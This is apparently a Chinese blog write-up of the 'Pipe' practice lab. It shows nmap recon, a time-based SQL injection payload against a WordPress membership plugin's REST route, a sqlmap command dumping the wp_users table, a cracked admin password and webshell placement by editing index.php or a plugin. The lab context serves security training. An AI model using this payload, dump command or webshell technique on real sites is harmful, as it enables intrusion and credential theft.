首页 > 其他分享 >Pipe pg walkthrough Intermediate

Pipe pg walkthrough Intermediate

时间:2025-01-14 17:22:27浏览次数:1  
标签:sqlmap http -- cpe tcp Pipe walkthrough Intermediate linux

NAMP
┌──(root?kali)-[~]
└─# nmap -p- -A 192.168.128.45
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-14 07:03 UTC
Stats: 0:00:40 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.30% done; ETC: 07:04 (0:00:00 remaining)
Nmap scan report for 192.168.128.45
Host is up (0.071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
|   256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_  256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://affliation.local/
|_http-server-header: nginx/1.18.0
Device type: general purpose|router
Running: Linux 5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 8080/tcp)

只有80 和 22 端口 那么方向很明显了就是80web站点有漏洞

访问会跳转到一个域名
image

在host 里面加上这个域名

发现是wordpress 6.2
image

wpscan扫描
发现了一个版本较低的插件
image

我们上网搜到了插件的poc
https://www.exploit-db.com/exploits/51235

尝试运行 发现漏洞确实存在
image
但是他这里给出的方案是用sqlmap去扫描
但是为了锻炼自己 以及oscp考试的要求是不能用sqlmap的
我们尝试手动注入

为了快捷方便的看看 他的poc是啥
proxychains python exp.py http://affliation.local
我用proxychains 直接让python 的request发包 走bp的代理

image
可以看到poc是
rest_route=/pmpro/v1/order&code=a' OR (SELECT 1 FROM (SELECT(SLEEP(1)))a)-- -
那么我们尝试在这个poc 上改进
这个先标记一下
现在我们再看看有无其他入手点

好像也没找到啥了

然后发现这个sql注入是盲注的 无奈之下还是用sqlmap吧
不然以我的能力写不出来

sqlmap -u "http://affliation.local/?rest_route=/pmpro/v1/order&code=a" -p code --skip-heuristics --technique=T --dbms=mysql --batch --dump -T wp_users -C user_login,user_pass
接下来就是慢慢等他脱库了

OK经历了一个世纪
image
我们爆破一下这个密码把
先判断是啥类型的hash
image
然后再爆破
image
letsyouupdateyourfunnotesandmore
登录后台成功
image
尝试该404.php 来反弹shell 然后我发现找不到404的php在哪
image
于是我该index.php 页面
image
image
发现我们竟然是root
懒得get反弹shell了
直接读flag 这连提权都不需要

我现在要针对wordpress研究一下 哪些地方写webshell 能快速定位到
一个是index.php
我现在尝试一下用plugin 写shell

image
这个插件我们经常看到
而且我们也扫到了
image

尝试改这个
image
然后启动它
image

发现也能行得通
image

标签:sqlmap,http,--,cpe,tcp,Pipe,walkthrough,Intermediate,linux
From: https://www.cnblogs.com/wssw/p/18671202

相关文章

  • 5.5.1 IPIPE劫持系统调用的流程与场景
    点击查看系列文章=》 InterruptPipeline系列文章大纲-CSDN博客原创不易,需要大家多多鼓励!您的关注、点赞、收藏就是我的创作动力!5.5IPIPE:Xenomai/Linux双核系统调用5.5.1IPIPE劫持系统调用的流程与场景参考《5.1.2内核层:ARM64Linux系统调用的流程》,先回顾一下ARM6......
  • bullyBox pg walkthrough Intermediate
    nmap发现80和22端口访问80端口发现跳转http://bullybox.local/在/etc/hosts里面加上这个域名dirsearch扫描的时候发现了.git泄露用dunpall工具获取.git泄露的源码查看源码我们发现了数据库的密码'name'=>'boxbilling','user'=>'admin','password'=>......
  • screenpipe - 全天候录制屏幕的 AI 助手
    7800Stars423Forks78Issues26贡献者MITLicenseRust语言代码:GitHub-mediar-ai/screenpipe:library&platformtobuild,distribute,monetizeaiappsthathavethefullcontext(likerewind,granola,etc.),opensource,100%local,developerfrien......
  • jenkins入门13--pipeline
    Jenkins-pipeline(1)-基础为什么要使用pipeline代码:pipeline以代码的形式实现,通过被捡入源代码控制,使团队能够编译,审查和迭代其cd流程可连续性:jenkins重启或者中断后都不会影响pipelinejob停顿:pipeline可以选择停止并等待人工输入或者批准,然后在继续pipeline运行......
  • CICD Day8、Pipeline实现网站项目的自动发布
    为了更好的理解Pipeline脚本和cicd流程,本次将使用一个java语言开发的用户信息管理系统进行实践项目源代码的仓库的地址为http://172.16.99.82:88/root/java-web-demo.git1Pipeline脚本基本结构我们将Pipeline脚本的构建过程分为拉取代码、代码编译、构建镜像、部署到K8s......
  • CICD Day7、Jenkins Pipeline 常用指令及Pipeline快捷生成方式(片段生成器)
    1、常用指令在编写Pipeline脚本时,会涉及各种指令,这些指令用于实现构建过程中的不同功能。熟悉这些指令后,编写一个完整的Pipeline脚本将变得十分简单1.1shsh指令用于执行shell命令,配置示例如下stage('Build'){stage{sh'hostname'}}在上述配置中,在构建......
  • flow pg walkthrough Intermediate
    nmapnmap-p--A-T4-sS192.168.114.104StartingNmap7.94SVN(https://nmap.org)at2025-01-0703:03UTCNmapscanreportfor192.168.114.104Hostisup(0.072slatency).Notshown:65533filteredtcpports(no-response)PORTSTATESERVICEVERSION......
  • 智能驾驶——11.03 摄像头图像处理Pipeline
    0Preface    前文<摄像头传感器基本概念>已经提到摄像头数据通过<摄像头传感器接口>传输到AD域控制器中,进行进一步的数据处理并提供给算法进行环境识别也就是“感知”环节。摄像头数据进入SOC后有一套流水线进行图像数据处理,SOC设计采用的图像芯片IP不同,所以参与图像......
  • Miniconda如何快速创建Pipenv虚拟环境的依赖
    当开发人员A使用pipenv管理依赖,而开发人员B使用miniconda时,B可以通过以下步骤快速导入A的项目依赖:步骤1:确认Python版本首先,确保A和B使用的Python版本兼容。可以通过查看Pipfile中的python_version字段来确认。步骤2:导出依赖开发人员A可以使用以下命令将Pipfile.lock......
  • Transformers 框架 Pipeline 任务详解(六):填充蒙版(fill-mask)
    在自然语言处理(NLP)领域,填空或填补句子中的缺失部分是一项重要的任务。它不仅考验了模型对语言的理解能力,还展示了其生成合理且语义连贯的文本的能力。HuggingFace的Transformers框架通过其PipelineAPI提供了强大的fill-mask功能,允许开发者和研究者轻松构建并应用这种填空技......